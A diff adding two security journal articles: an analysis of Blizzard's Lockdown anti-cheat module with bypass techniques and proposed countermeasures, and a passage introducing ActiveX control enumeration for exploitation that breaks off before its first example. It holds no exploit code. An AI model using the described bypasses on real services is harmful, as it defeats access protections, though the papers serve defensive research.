a/uninformed/9.1.txt b/uninformed/9.1.txt new file mode 100644 index 0000000..e05f1de --- /dev/null +++ b/uninformed/9.1.txt @@ -0,0 +1,639 @@ +An Objective Analysis of the Lockdown Protection System for Battle.net +12/2007 +Skywing +skywing@valhallalegends.com + +Abstract + +Near the end of 2006, Blizzard deployed the first major update to the version +check and client software authentication system used to verify the authenticity +of clients connecting to Battle.net using the binary game client protocol. This +system had been in use since just after the release of the original Diablo +game and the public launch of Battle.net. The new authentication module +(Lockdown) introduced a variety of mechanisms designed to raise the bar with +respect to spoofing a game client when logging on to Battle.net. In addition, +the new authentication module also introduced run-time integrity checks of +client binaries in memory. This is meant to provide simple detection of many +client modifications (often labeled "hacks") that patch game code in-memory in +order to modify game behavior. The Lockdown authentication module also +introduced some anti-debugging techniques that are designed to make it more +difficult to reverse engineer the module. In addition, several checks that +are designed to make it difficult to simply load and run the Blizzard +Lockdown module from the context of an unauthorized, non-Blizzard-game +process. After all, if an attacker can simply load and run the Lockdown +module in his or her own process, it becomes trivially easy to spoof the game +client logon process, or to allow a modified game client to log on to +Battle.net successfully. However, like any protection mechanism, the new +Lockdown module is not without its flaws, some of which are discussed in +detail in this paper. + +1) Introduction + +The Lockdown module is a part of several schemes that attempt to make it +difficult to connect to Battle.net with a client that is not a "genuine" +Blizzard game. For the purposes of this paper, the author considers both +modified/"hacked" Blizzard game clients, and third-party client software, +known as "emubots", as examples of Battle.net clients that are not genuine +Blizzard games. The Battle.net protocol also incorporates a number of schemes +(such as a proprietary mechanism for presenting a valid CD-Key for inspection +by Battle.net, and a non-standard derivative of the SRP password exchange +protocol for account logon) that by virtue of being obscure and undocumented +make it non-trivial for an outsider to successfully log a non-genuine client +on to Battle.net. + +Prior to the launch of the Lockdown module, a different system took its place and +filled the role of validating client software versions. The previous system +was resistant to replay attacks (caveat: a relatively small pool of challenge +response values maintained by servers makes it possible to use replay attacks +after observing a large number of successful logon attempts) by virtue of the +use of a dynamically-supplied checksum formula that is sent to clients (a +challenge, in effect). This formula was then interpreted by the predecessor +to the Lockdown module, otherwise known as the "ver" or "ix86ver" module, +and used to create a one-way hash of several key game client binaries. The +result response would then be sent back to the game server for verification, +with an invalid response resulting in the client being denied access to +Battle.net. + +While the "ver" module provides some inherent resistance to some +types of non-genuine clients (such as those that modify Blizzard game binaries +on disk), it does little to stop in-memory modifications to Blizzard game +clients. Additionally, there is very little to stop an attacker from creating +their own client software (an "emubot") that implements the "ver" module's +checksum scheme, either by calling "ver" directly or through the use of a +third-party, reverse-engineered implementation of the algorithm implemented in +the "ver" module. It should be noted that there exists one basic protection +against third party software calling the "ver" module directly; the "ver" +series of modules are designed to always run part of the version check hash on +the caller process image (as returned by the Win32 API GetModuleFileNameA). +This poses a minor annoyance for third party programs. In order to bypass +this protection, however, one need only hook GetModuleFileNameA and fake the +result returned to the "ver" module. + +Given the existing "ver" module's capabilities, the Lockdown module +represents a major step forward in the vein of assuring that only genuine +Blizzard client software can log on to Battle.net as a game client. The +Lockdown module is a first in many respects for Blizzard with respect to +releasing code that actively attempts to thwart analysis via a debugger +(and actively attempts to resist being called in a foreign process with +non-trivial mechanisms). + +Despite the work put into the Lockdown module, however, it has proven perhaps +less effective than originally hoped (though the author cannot state the +definitive expectations for the Lockdown module, it can be assumed that a +"hacking life" of more than several days was an objective of the Lockdown +module). This paper discusses the various major protection systems embedded +into the Lockdown module and associated authentication system, potential +attacks against them, and technical counters to these attacks that Blizzard +could take in a future release of a new version check/authentication module. + +Part of the problem the developers of the Lockdown module faced relates to +constraints on the environment in which the module operates. The author has +derived the following constraints currently in place for the module: + +1. The server portion of the authentication system is likely static and does not + generate challenge/response values in real time. Instead, a pool of possible + values appear to be pregenerated and configured on the server. +2. The module needs to work on all operating systems supported by all Blizzard + games, which spans the gamut from Windows 9x to Windows Vista x64. Note that + there are provisions for different architectures, such as Mac OS, to use a + different system than Windows architectures. +3. The module needs to work on all versions of all Blizzard Battle.net games, + including previous versions. This is due to the fact that the module plays + an integral part in Battle.net's software version control system, and thus + is used on old clients before they can be upgraded. +4. Legitimate users should not see a high incidence of false positives, and it + is not desirable for false positives to result in automated permanent action + against legitimate users (such as account closure). + +As an aside, in the author's opinion, the version check and authentication +system is not intended as a copy protection system for Battle.net, as it does +nothing to discourge additional copies of genuine Blizzard game software from +being used on Battle.net. In essence, the version check and authentication +system is a system that is designed to ensure that only copies of the +genuine Blizzard game software can log on to Battle.net. Copy protection +measures on Battle.net are provided through the CD-Key feature, wherein the +server requires that a user has a valid (and unique) CD-Key (for applicable +products). + +2) Protection Schemes of the Lockdown Module + +As a stark contrast to the old "ver" module, the Lockdown module includes a +number of active defense mechanisms designed to significantly strengthen the +module's resistance to attack (including either analysis or being tricked into +providing a "good" response to a challenge to an untrusted process). + +The protection schemes in the Lockdown module can be broken up into several +categories: + +1. Mechanisms to thwart analysis of the Lockdown module itself and the secret + algorithm it implements (anti-debugging/anti-reverse-engineering). +2. Mechanisms to thwart the successful use of Lockdown in a hostile process to + generate a "good" response to a challenge from Battle.net (anti-emubot, and + by extension anti-hack, where "anti-hack" denotes a counter to modifications + of an otherwise genuine Blizzard game client). +3. Mechanisms to thwart modifications to an otherwise-genuine Blizzard game + client that is attempting to log on to Battle.net (anti-hack). + +In addition, the Lockdown module is also responsible for implementing a +reasonable facsimile of the original function of the "ver" module; that is, to +provide a way to authoritatively validate the version of a genuine Blizzard +game client, for means of software version control (e.g. the deployment of +the correct software updates/patches to old versions of genuine Blizzard game +clients connecting to Battle.net). + +In this vein, the following protection schemes are present in the Lockdown +module and associated authentication system: + +2.1) Clearing the Processor Debug Registers + +The x86 family of processors includes a set of special registers that are +designed to assist in the debugging of programs. These registers allow a user +to cause the processor to stop when a particular memory location is accessed, +as an instruction fetch, as a data read, or as a data write. This debugging +facility allows a user (debugger) to set up to four different virtual addresses +that will trap execution when referenced in a particular way. The use of these +debug registers to set traps on specific locations is sometimes known as +setting a hardware breakpoint", as the processor's dedicated debugging +support (in-hardware) is being utilized. + +Due to their obvious utility to anyone attempting to analyze or reverse +engineer the Lockdown module, the module actively attempts to disable this +debugging aid by explicitly zeroing the contents of the key debug registers in +the context of the thread executing the Lockdown module's version check +call, CheckRevision. All the requisite debug registers are cleared immediately +after the call to the CheckRevision routine in the Lockdown module is made. + +This protection mechanism constitutes an anti-debugging scheme. + +2.2) Memory Checksum Performed on the Lockdown Module + +The Lockdown module, contrary to the behavior of its predecessor, implements +a checksum of several key game executable files in-memory instead of on-disk. +In addition to the checksum over certain game executables, the Lockdown +module includes itself in the list of modules to be checksumed. This provides +several immediate benefits: + +1. Attempts to set conventional software breakpoints on routines inside the + Lockdown module will distort the result of the operation, frustrating + reverse engineering attempts. This is due to the fact that so-called + software breakpoints are implemented by patching the instruction at the + target location with a special instruction (typically `int 3') that causes + the processor to break into the debugger. The alteration to the module's + executable code in memory causes the checksum to be distorted, as the `int 3' + opcode is checksumed instead of the original opcode. +2. Attempts to bypass other protection mechanisms in the Lockdown module are + made more difficult, as an untrusted process that is attempting to cause the + Lockdown module to produce correct results via patching out certain other + protection mechanisms will, simply by virtue of altering Lockdown code + in-memory, inadvertently alter the end result of the checksum operation. The + success of this aspect of the memory checksum protection is related to the + fact that the Lockdown module attempts to disable hardware breakpoints as + well. These two protection mechanisms thus complement eachother in a strong + fashion, such that a naive attempt to compromise one of the protection + schemes would usually be detected by the other scheme. In effect, the result + is a rudimentary "defense in depth" approach to software protection schemes + that is the hallmark of most relatively successful protection schemes. +3. The inclusion of the version check module itself in the result of the output + of the checksum is entirely new to the version check and client + authentication system, and as such poses an additional, unexpected "speed + bump" to persons attempting to reimplement the Lockdown algorithm in their + own code. + +This protection mechanism has characteristics of both an anti-debugging, +anti-hack, and anti-emubot system. + +2.3) Hardcoding of Module Base Addresses + +As mentioned previously, the Lockdown module now implements a checksum over +game executables in-memory instead of on-disk. Taking advantage of this +change, the Lockdown module can hardcode the base address of the main process +executable at the default address of 0x00400000. This is safe because no +Blizzard game executable includes base relocation information, and as a result +will never change from this base address. + +By virtue of hardcoding this address, it becomes more difficult for an +untrusted process to successfully call the Lockdown module. Unless the +programmer is particularly clever, he or she may not notice that the Lockdown +module is not actually performing a checksum over the main executable for the +desired Blizzard game, but instead the main executable of the untrusted process +(the default address for executables in the Microsoft linker program is the +same 0x00400000 value used in Blizzard's main executables comprising their +game clients). + +While it is possible to change the base address of a program at link-time, +which could be done by a third-party process in an attempt to make it possible +to map the desired Blizzard main executable at the 0x00400000 address, it is +difficult to pull this off under Windows NT. This is because the 0x00400000 +address is low in the address space, and the default behavior of the kernel's +memory manager is to find new addresses for memory allocations starting from +the bottom of the address space. This means that in virtually all cases, a +virgin Win32 process will already have an allocation (usually one of the shared +sections used for communication with CSRSS in the author's experience) that is +overlapping the address range required by the Lockdown module for the main +executable of the Blizzard game for which a challenge response is being +computed. While it is possible to change this behavior in the Windows NT +memory manager and cause allocations to start at the top of the address space +and search downwards, this is not the default configuration and is also a +relatively not-well-known kernel option. The fact that all users would need to +be reconfigured to change the default allocation search preference for an +untrusted process to typically successfully map the desired Blizzard game +executable makes this approach relatively painful for a would-be attacker. + +The Lockdown module also ensures that the return value of the +GetModuleHandleA(0) Win32 API corresponds to 0x00400000, indicating that the +main process image is based at 0x00400000 as far as the loader is concerned. +The restriction on the base address of the game main executable module has the +unfortunate side effect that it will not be possible to take advantage of +Windows Vista's ASLR attack surface reduction capabilities, negatively +impacting the resistance of Blizzard games to certain classes of exploitation +that might impact the security of users. + +This protection mechanism is primarily considered to be an anti-emubot scheme, +as it is designed to guard against an untrusted process from succcessfully +calling the Lockdown module. + +2.4) Video Memory Checksum + +Another previously nonexistant component to the version check algorithm that is +introduced by the Lockdown module is a checksum over the video memory of the +process calling the Lockdown module. At the point in time where the module +is invoked by the Blizzard game, the portion of video memory checksummed should +correspond to part of the "Battle.net" banner in the log on screen for the +Blizzard game. The Lockdown module is currently only implemented for +so-called "legacy" game clients, otherwise known as clients that use Battle.snp +and the Storm Network Provider system for multiplayer access. This includes +all Battle.net-capable Blizzard games ranging from Diablo I to Starcraft and +Warcraft II: BNE. Future games, such as Diablo II, are not supported by the +Lockdown module. + +This represents an additional non-trivial challenge to a would-be attacker. +Although the contents of the video memory to be checksummed is static, the way +that the Lockdown module retrieves the video memory pointers is through an +obfuscated call to several internal Storm routines (SDrawSelectGdiSurface, +SDrawLockSurface, and SDrawUnlockSurface) that rely on a non-trivial amount of +internal state initialized by the Blizzard game during startup. This makes the +use of the internal Storm routines unlikely to simply work "out of the box" in +an untrusted process that has not gone to all the trouble to initialize the +Storm graphics subsystem and draw the appropriate data on the Storm video +surfaces. + +This protection mechanism is primarily considered to be an anti-emubot scheme, +as it is designed to guard against an untrusted process from succcessfully +calling the Lockdown module. + +2.5) Multiple Flavors of the Lockdown Module + +The original "ver" module scheme pioneered a system wherein there were multiple +downloadable flavors of the version check module to be used by a client. The +Battle.net server sends the client a tuple of (version check module filename, +checksum formula and initialization parameters, version check module timestamp) +that is used in order to version (and download, if necessary) the latest copy +of the version check module. This mechanism provides for the possibility that +the Battle.net server could support multiple "flavors" of version check module +that could be distributed to clients in order to increase the amount of work +required by anyone seeking to reimplement the version check and authentication +system. + +The original "ver" module and associated authentication scheme in fact utilized +such a scheme of multiple "ver" modules, and the Lockdown scheme expands upon +this trend. In the original system, there were 8 possible modules to choose +from; the Lockdown system, by contrast, expands this to a set of 20 +possibilities. However, the version check modules in both systems are still +very similar to one another. In both systems, each module has its own unique +key (a 32-bit values in the "ver" system, and a 64-bit value in the Lockdown +system) that is used to influence the result of the version check checksum (it +should be noted that in the Lockdown system, the actual Lockdown module +itself is in essence a second "key", as the added checksum over the module +represents an additional adjustment to the final checksum result that changes +with each Lockdown module). This single difference is disguised by other +minor, superficial alterations to each module flavor; there are slight +differences by which module base addresses are retrieved, for instance, and +there are also other superficial differences that relate to differences like +code being moved between functions or functions being re-arranged in the final +binary in order to frustrate a simple "diff" of two Lockdown modules as +being informative in revealing the functional differences between the said two +modules. + +This protection mechanism is perhaps best classed as an anti-analysis scheme, +as it attempts to create more work for anyone attempting to reverse engineer +the authentication system as a whole. + +2.6) Authenticity Check Performed on Lockdown Module Caller + +An additional new protection scheme introduced in the Lockdown module is a +rudimentary check on the authenticity of the caller of the module's export, +the CheckRevision routine. Specifically, the module attempts to ascertain +whether the return address of the call to the CheckRevision routine points to a +code location within the Battle.snp module. If the return pointer for the call +to CheckRevision is not within the expected range, then an error is +deliberately introduced into the checksum calculations, ultimately resulting in +the result returned by the Lockdown module becoming invalidated. + +3) Attacks (and Counter-Attacks) on the Lockdown System + +Though the Lockdown module introduces a number of new defensive mechanisms +that attempt to thwart would-be attackers, these systems are far from +fool-proof. There are a number of ways that these defensive systems could be +attacked (or subverted) by a would-be attacker who wishes to pass the version +and authentication check in the context of a non-genuine client for purposes of +logging on to Battle.net. In addition, there are also a variety of different +ways by which these proposed attacks could be thwarted in a future update to +the version check and authentication system. + +3.1) Interception of SetThreadContext + +As previously described, the Lockdown modules attempt to disable the use of +the processor's complement of debug registers in order to make it difficult +to utilize so-called hardware breakpoints during the process of reverse +engineering or analyzing a Lockdown module. This scheme is, at present, +relatively easily compromised, however. + +There are several possible attacks that could be used: + +1. Hook the SetThreadContext API and block attempts to disable debug registers + (programmatic). +2. Patch the import address table entry for SetThreadContext in the Lockdown + module to point to a custom routine that does nothing (programmatic). +3. Patch the Lockdown module instruction code to not call SetThreadContext in + the first place (programmatic). However, this is approach is considered to + be generally untenable, due to the memory checksum protection scheme. +4. Set a conditional breakpoint on `kernel32!SetThreadContext' that re-applies + the hardware breakpoint state after the call, or simply alters execution + flow to immediately return (debugger). + +Depending on whether the attacker wants to make programmatic alterations to the +behavior of the Lockdown module via hardware breakpoints, or simply wishes +to observe the behavior of the module in the debugger unperturbed, there are +several options available. + +The suggested counters include techniques such as the following: + +1. Verify that the debug registers were really cleared. However, this could + simply be patched out as well. More subtle would be to include the value + of several debug registers in the checksum calculations, but this would also + be fairly obvious to attackers due to the fact that debug registers cannot be + directly accessed from user mode and require a call to Get/SetThreadContext, + or the underlying NtGet/SetContextThread system calls. +2. Include additional calls to disable debug register usage in different + locations within the Lockdown module. To be most effective, these would + need to be inlined and use different means to set the debug register state. + For example, one location could use a direct import, another could use a + GetProcAddress dynamic import, a third could manually walk the EAT of + kernel32 to find the address of SetThreadContext, and a fourth could make + a call to NtSetContextThread in ntdll, and a fifth could disassemble the + opcodes comprising NtSetContextThread, determine the system call ordinal, + and make the system call directly (e.g. via `int 2e'). The goal here is to + add additional work and eliminate "single points of failure" from the + perspective of an attacker seeking to disable the anti-debugging feature. + Note that the direct system call approach will require additional work in + order to function under Wow64 (e.g. x64 computers running native Windows + x64). +3. Verify that all IAT entries corresponding to kernel32 actually point to the + same module in-memory. This is risky, though, as in some cases (such as when + the Microsoft application compatibility layer module is in use), these APIs + may be legitimately detoured. + +3.2) Use of Hardware Breakpoints + +Assuming an attacker can compromise the anti-debugging protection scheme, then +he or she is free to make clever use of hardware breakpoints to disable other +protection systems (such as hardcoded base addresses of modules, checks on the +authenticity of a CheckRevision caller, and soforth) by setting execute fetch +breakpoints on choice code locations. Then, the attacker could simply alter +the execution context when the breakpoints are hit, in order to bypass other +protection mechanisms. For example, an attacker could set a read breakpoint +on the hardcoded base address for the main process image inside the Lockdown +module, and change the base address accordingly. The attacker would also +have to patch GetModuleHandleA in order to complete this example attack. + +Suggested counters to attacks based on hardware breakpoints include: + +1. Validation of the vectored exception handler chain, which might be used to + intercept STATUSSINGLESTEP exceptions when hardware breakpoints are hit. + This is risky, as there are legitimate reasons for there to be "foreign" + vectored exception handlers, however. +2. Checks to stop debuggers from attaching to the process, period. This is not + considered to be a viable solution since there are a number of legitimate + reasons for a debugger to be attached to a process, many of them which may + be unknown completely to the end user (such as profilers, crash control and + reporting systems, and other types of security software). Attempting to + block debuggers may also prevent the normal operation of Windows Error + Reporting or a preconfigured JIT debugger in the event of a game crash, + depending on the implementation used. Ways of detecting debuggers include + calls to IsDebuggerPresent, NtQueryInformationProcess(...ProcessDebugPort..), + checks against NtCurrentPeb()->BeingDebugged, and soforth. +3. Duplication of checks (perhaps in slightly altered forms) throughout the + execution of the checksum implementation. It is important for this + duplication to be inline as much as possible in order to eliminate single + points of failure that could be used to short-circuit protection schemes by + an attacker. +4. Strengthening of the anti-debugging mechanism, as previously described. + +3.3) Main Process Image Module Base Address Restriction + +An attacker seeking to execute the Lockdown module in an untrusted process +would need to bypass the restrictions on the base address of the main process +image. The most likely approach to this would be a combination attack, whereby +the attacker would use something like a set of hardware breakpoints to alter +the hardcoded restrictions on module base addresses, and import table or code +patch style hooks on the GetModuleHandleA API in order to defeat the secondary +check on the module base address for the main executable image. + +Another approach would be to simply create the main executable image as a +process, suspended, and then either create a new thread in the process or +assume control of the initial thread in order to execute the Lockdown module. +This gets the would-be attacker out of having to patch checks in the module, as +there is currently no defense against this case implemented in the module. + +In order to strengthen this protection mechanism, the following approaches +could be taken: + +1. Manually traverse the loaded module list (and examine the PEB) in order to + validate that the main process image is really at 0x00400000. All of these + mechanisms could be compromised, but checking each one creates additional + work for an attacker. +2. Verify that the game has initialized itself to some extent. This would + make the approach of creating the game process suspended more difficult. It + would also otherwise make the use of the Lockdown module in an untrusted + process more difficult without tricking the module into believing that it is + running in an initialized game process. The scope of determining how the + game is initialized is outside of this paper, although an approach similar + to the current one based on a checksum of Storm video memory (though with + more "redundancy", or an additional matrix of requirements for a legitimate + game process). + +3.4) Minor Functional Differences Between Lockdown Module Flavors + +Presently, an attacker needs to implement all flavors of the Lockdown module +in order to be assured of a successful connection to Battle.net. However, +even with the 20 possibilities now available, this is still not difficult due +to the minor functional differences between the different Lockdown flavors. +Moreso, it is trivially possible to find the "magic" constants that constitute +the only functional differences between each flavor of Lockdown. + +In the author's tests, two pattern matches and a small 200-line C program were +all that were necessary to programmatically identify all of the magical +constants that represent the functional differences between each flavor of +Lockdown module, in a completely automated fashion. In fact, the author would +wager that it took more time to implement all 20 different flavors of Lockdown +modules than it took to devise and implement a rudimentary pattern matching +system to automagically discover all 20 magical constants from the set of 20 +Lockdown module flavors. Clearly, this is not desirable from the standpoint +of effort put in to the protection scheme vs difficulty in attacking it. + +In order to address these weaknesses, the following steps could be implemented: + +1. Implement true, major functional differences between Lockdown flavors. + Instead of using a single constant value that is different between each + flavor (probably a "" preprocessor constant), implement other, + real functional differences. Otherwise, even with a number of different + "non-functional" differences between module flavors, a pattern-matching + system will be able to quickly locate the different constants for each + module after a human attacker has discovered the constant for at least one + module flavor. +2. Avoid using quick-to-substitute constants as the "meat" of the functional + differences betwene flavors. While these are convenient from a development + perspective, they are also convenient from an attacker perspective. If a + bit more time were spent from a development perspective, attackers could be + made to do real analysis of each module separately in order to determine the + actual functional differences, greatly increasing the amount of time that is + required for an attacker to defeat this protection scheme. + +3.5) Spoofed Return Address for CheckRevision Calls + +Due to how the x86 architecture works, it is trivially easy to spoof the return +address pointer for a procedure call. All that one must do is push the spoofed +return address on the stack, and then immediately execute a direct jump to the +target procedure (as opposed to a standard call). + +As a result, it is fairly trivial to bypass this protection mechanism at +run-time. One need only search for a `ret' opcode in the code space of the +Battle.snp module in memory, and use the technique described previously to +simply "bounce" the call off of Battle.snp via the use of a spoofed return +address. To the Lockdown module, the call will appear to originate from the +context of Battle.snp, but in reality the call will immediately return from +Battle.snp to the real caller in the untrusted process. + +To counter this, the following could be attempted: + +1. Verify two return addresses deep, although due to the nature of the x86 + calling conventions (at least stdcall and fastcall, the two used by + Blizzard code frequently), it is not guaranteed that four bytes past the + return address will be a particularly meaningful value. +2. Verify that the return address does not point directly to a `ret', `jmp', + `call' or similar instruction, assuming that current Battle.snp variations do + not use such patterns in their call to the module. This only slightly raises + the bar for an attacker, though; he or she would only need pick a more + specific location in Battle.snp through which to stage a call, such as the + actual location used in normal calls to the Lockdown module. + +3.6) Limited Pool of Challenge/Response Tuples + +Presently, the Battle.net servers contain a fairly limited pool of possible +challenge/response pairs for the version check and authentication system. +Observations suggest that most products have a pool of around one thousand +values that can be sent to clients. This has been used against Battle.net in +the past, which was countered by an increase to 20000 possible values for +several Battle.net products. Even with 20000 possible values, though, it is +still possible to capture a large number of logon attempts over time and build +a lookup table of possible values. This is an attractive option for an +attacker, as he or she need only perform passive analysis over a period of time +in order to construct a database capable of logging on to Battle.net with a +fairly high success rate. Given the relative infrequency of updates to the +pool of version check values (typically once per patch), this is considered to +be a fairly viable method for an attacker to bypass the version check and +authentication system. + +This limitation could easily be addressed by Blizzard, however, such as through +the implementation of one or more of the below suggestions: + +1. Periodically rotate the set of possible version check values so as to ensure + that a database of challenge/response pairs would quickly expire and need to + be rebuilt. Combined with a large pool of possible values, this approach + would greatly reduce the practicality of this attack. Unfortunately, the + author suspects that this would require manual intervention each time the + pools were to be rotated by the part of Blizzard in the current Battle.net + server implementation. +2. Implement dynamic generation of pool values at runtime on each Battle.net + server. This would require the server to have access to the requisite client + binaries, but is not expected to be a major challenge (especially since the + author suspects that Battle.net is powered by Windows already, which would + allow the existing Lockdown module code to be cleaned up and repackaged for + use on the server as well). This could be implemented as a pool of possible + values that is simply stirred every so often; new challenge/response values + need not necessarily be generated on each logon attempt (and doing so would + have undesirable performance implications in any case). + +4) Conclusion + +Although the Lockdown module and associated authentication system represent +a major break in Blizzard's ongoing battle against non-genuine Battle.net +client software, there are still many improvements that could be made in a +future release of the version check and authentication system which would fit +within the constraints imposed on the version check system, and still pose a +significant challenge to an adversary attempting to spoof Battle.net logons +using a non-genuine clients. The author would encourage Blizzard to consider +and implement enhancements akin to those described in this paper, particularly +protections that overlap and complement each other (such as the debug register +clearing and memory checksum schemes). + +In the vein of improving the Lockdown system, the author would like to stress +the following principles as especially important in creating a system that is +difficult to defeat and yet still workable and viable from a development and +deployment perspective: + +- Defense in depth with respect to the various protection mechanisms in place + within the module is a must. Protection systems need to be designed to + complement and reinforce eachother, such that an attacker must defeat a + number of layers of protection schemes for any one significant attack to + succeed to the point of being a break in the system. + +- Countermeasures intended to frustrate reverse engineering or easy duplication + of critical algorithms need to be viewed in the light of what an adversary + might do in order to 'attack' (or duplicate, re-implement, or whatnot) a + 'guarded' (or otherwise important) algorithm or section of code. For + example, an attacker could ease the work of reimplementing parts of an + algorithm or function of interest by wholesale copying of assembler code + into a different module, or by loading an "authentic" module and making + direct calls into internal functions (or the middle of internal functions) in + an effort to bypass "upstream" protection checks. Keeping with this line of + thinking, it would be advisible to interleave protection checks with code + that performs actual useful work to a certain degree, such that it is less + trivial for an adversary to bypass protection checks that are entirely done + "up front" (leaving the remainder of a secret algorithm or function + relatively "vulnerable", if the check code is skipped entirely). + +- Countermeasures intended to create "time sinks" for an adversary need to be + carefully designed such that they are not easily bypassed. For instance, in + the current Lockdown module implementation, there are twenty flavors of the + Lockdown module; yet, in this implementation, it is trivially easy for an + adversary to discover the differences (in a largely programmatic fashion), + making this "time sink" highly ineffective, as the time for an adversary to + breach it is likely much less than the time for the original developers to + have created it. + +- Measures that depend on external, imported APIs are often relatively easy for + an attacker to quickly pinpoint and disable (for example, the method that + debug register breakpoints are disabled by the Lockdown module is + immediately obvious to an adversary, if they are even the least bit familiar + with the Win32 API (which must be assumed). In some cases (such as with the + debug register breakpoint clearing code), this cannot be avoided, but in + others (such as validation of module base addresses), the same effect could + be potentially implemented by use of less-obvious approaches (for example + manually traversing the loaded module list by locating the PEB and the + loader data structures from the backlink pointer in the current thread's + TEB). The author would encourage the developers of additional defensive + measures to reduce dependencies on easily-noticible external APIs as much as + possible (balanced, of course, against the need for maintainable code that + executes on all supported platforms). In some instances, such as the manual + resolution of Storm symbols, the current system does do a fair job of + avoiding easily-detectable external API use. + +All things considered, the Lockdown system represents a major step forward in +the vein of guarding Battle.net from unauthorized clients. Even so, there is +still plenty of room for improvements in potential future revisions of the +system. The author hopes that this article may prove useful in the +strengthening of future defensive systems, by virtue of a thorough accounting +of the strengths and weaknesses in the current Lockdown module (and pointed +suggestions as to how to repair certain weaker mechanisms in the current +implementation). diff --git a/uninformed/9.2.txt b/uninformed/9.2.txt new file mode 100644 index 0000000..03ac721 --- /dev/null +++ b/uninformed/9.2.txt @@ -0,0 +1,297 @@ +ActiveX - Active Exploitation +01/2008 +warlord +warlord@nologin.org +http://www.nologin.org + +Share what I know, learn what I don't + +1) Foreword + +First of all, I'd like to explain what this paper is all about, and +especially, what it is not. A few months ago I got into the technical details +of ActiveX for the first time. Prior to this point I only had some vague +ideas and a general understanding of what it is and how it works. What I did +first is probably quite obvious: I googled. To my surprise though, I could +not find a single paper discussing ActiveX and how to exploit it. My next step +was to contact some generally smart and knowledgable friends to harvest the +required information from them. I was even more surprised to find that some of +the most skilled people out there lacked the same knowledge that I did. +Perhaps it's our common background, coming from the Unix/Linux world, but +whatever the reason, I had to work to collect the information I now possess. +But still, I feel like I'm the one-eyed man explaining what the world looks +like to the blind. + +The fact that there are tons of ActiveX exploits on Milw0rm which would +suggest that the knowledge is out there by now. I wonder why no one took the +time to write it all up so the less knowledgable may get into this theater as +well. It's the intention of this paper to fill this gap. If you already know +everything about ActiveX, if you've found your own 0day and exploited it +successfully, I probably can't teach you any new tricks. Everyone else I +invite to read on. + +2) Introduction + +ActiveX[1] is a Microsoft technology introduced in 1996 and based on +the Component Object Model (COM) and Object Linking and Embedding (OLE) +technologies. The intention of COM has been to create easily reusable pieces of +code by creating objects that offer interfaces which can be called by other +COM objects or programs. This technology is widely used for what +Microsoft calls ActiveX[2] which represents the integration of COM +into Internet Explorer. This integration offers the ability to interface +with Windows as well as third-party applications with the MS browser. This +allows for the easy extension of functionality in the Internet Explorer by +giving software developers the ability to create complex applications which +can interface with websites through the browser. + +There are various ways for an ActiveX control to end up on any given machine. +Besides all the controls which are part of IE or the operating system, +programs may install and register ActiveX controls of their own to offer a +diverse set of functions in IE. Another way of installing a new control is +through web sites themselves. Depending on Internet Explorer security +settings, a website may try to instantiate a control, for example Shockwave +Flash, and failing to do so may prompt the user to install the Shockwave Flash +ActiveX control. + +Security issues seems to be a constant problem with ActiveX controls. +In fact, it seems most vulnerabilities in Windows nowadays are actually due to +poorly-written third-party controls which allow malicious websites to exploit +buffer overflows or abuse command injection vulnerabilities. Quite often +these controls make the impression of their authors not having realized their +code can be instantiated from a remote website. + +The following chapters will describe methods to find, analyze, and exploit +bugs in ActiveX controls will be presented to the reader. + +3) Control and functionality enumeration + +Any given Windows installation is likely to have a significant number of +registered COM objects. For the purpose of this paper, however, we are only +interested in controls which may be instantiated from a website. Quite a +number of the following details are taken out of the excellent "The Art +of Software Security Assessment"[3], a book I strongly recommend to +anyone interested in application security. + +ActiveX controls are usually, but not always, instantiated by passing their +CLSID to CoCreateInstance. The respective class identifier (CLSID) is used as +a unique value which is associated with each control in order to distinguish +it from its peers. A list of all the existing CLSIDs on a given Windows +installation can be found in the registry in HKEY_CLASSES_ROOT\CLSID, which +actually is nothing but an alias to HKEY_LOCAL_MACHINE\Software\Classes\CLSID. + +Within the CLSID key there are thousands of different class identifiers, all +of them specifying ActiveX controls. However, only a subset of those can be +instantiated by a website. Controls marked as safe for scripting are granted +this ability. To determine whether a certain control has this ability, it has +to be part of the respective category. Specifically, the category can be +found in the registry in the form: HKEY_CLASSES_ROOT\CLSID\\Implemented Categories. If a control is safe for scripting it may +indicate this by having a subkey with the GUID +7DD95801-9882-11CF-9FA9-00AA006C42C4. Similarly, the 'safe for initialization' +category is listed in the same location, but with a slightly different GUID. +Its value is 7DD95802-9882-11CF-9FA9-00AA006C42C4. + +In the end though, not being part of these categories doesn't necessarily mean +that a control cannot be called from IE. The component may dynamically report +itself as being safe for scripting when it is instantiated through IE. The +only surefire way is to try and instantiate a control and see if it can be +used. Axman[5] is an ActiveX fuzzer written by HD Moore which can automate this +check for all of the different CLSIDs on a system. Another tool to enumerate +the controls in question is iDefense's ComRaider[4], another ActiveX fuzzer, +which has the ability to build a database of controls that IE should be able +to instantiate. + +3.1) ProgIDs + +Besides the long and rather hard to memorize CLSID there is often a second +way of instantiating a certain control. This can be accomplished through the +use of a control's program ID (progID). Quite similar to IP addresses and the +domain name system(DNS), progIDs can be looked up to determine the matching +CLSID. Once the right one has been determined, Internet Explorer goes on as +if the CLSID had been provided in the first place. + +For this technique to work for a given control, two requirements must be met. +First, a control must have a ProgID subkey under their CLSID key in the +register. ProgIDs are usually in the form Program.Component.Version such as +SafeWia.Script.1. Second, as there is no point for Windows to walk through up +to 2700 CLSIDs(in my example) to find the specified ProgID, the program ID +itself must have a key in HKEY_CLASSES_ROOT with a subkey named CLSID which +describes makes the association. + +3.2) The Kill Bit + +In some cases it is desirable to restrict a control from ever being +instantiated in IE. This can be accomplished through the use of a +kill bit. The kill bit can be defined by setting the 0x00000400 bit +in the DWORD associated with a given CLSID: + +HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\ + +3.3) User Specific Controls + +With Windows XP, Microsoft introduced support for user-specific ActiveX +controls. These do not require Administrator-level access to install because +the controls are specific to a certain user, as the name already implies. +These controls can be found under HKEY_CURRENT_USER\Software\Classes. While +this functionality exists, most ActiveX controls are installed globally. + +3.4) Determining Exported Functions + +ActiveX controls implement various COM interfaces in the same manner as any +other COM object. COM interfaces are well-defined definitions of what +functions and properties a COM class must implement and support. COM provides +the ability to dynamically query a COM class at runtime using QueryInterface +to see what interfaces it implements. This is how IE determines if a control +supports the safe for scripting interface (which is called IObjectSafety). + +4) Examples + +4.1) MW6 Technologies QRCode ActiveX 3.0 + +In this section the previously provided information will be demonstrated with +the help of a recent public ActiveX vulnerability and exploit. The vulnerable +control is from a company called WM6 and comes with their ``QRCode ActiveX'' +version 3.0. When I downloaded the software in January 2008, several months +after the exploit was posted on 